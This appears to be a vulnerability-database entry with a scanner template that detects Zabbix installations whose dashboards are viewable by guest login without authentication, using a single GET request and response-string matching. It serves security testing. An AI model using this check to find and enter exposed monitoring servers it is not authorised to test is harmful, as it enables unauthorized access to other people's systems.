zabbix-dashboards-access: Zabbix Dashboards Access

2025-08-01 zabbix PoC Public

Description

View dashboard with guest login.

PoC

id: zabbix-dashboards-access

info:
  name: Zabbix Dashboards Access
  author: pussycat0x,vsh00t
  severity: medium
  verfied: true
  description: |-
    View dashboard with guest login.
  reference:
    - https://www.exploit-db.com/ghdb/5595
    - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt
  tags: zabbix,unauth
  created: 2023/07/07

rules:
  r0:
    request:
      method: GET
      path: /zabbix/zabbix.php?action=dashboard.list
      headers:
        User-Agent: TNAS
    expression: |
      response.status == 200 && response.body.bcontains(b'Create dashboard') && response.body.bcontains(b'Zabbix SIA')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities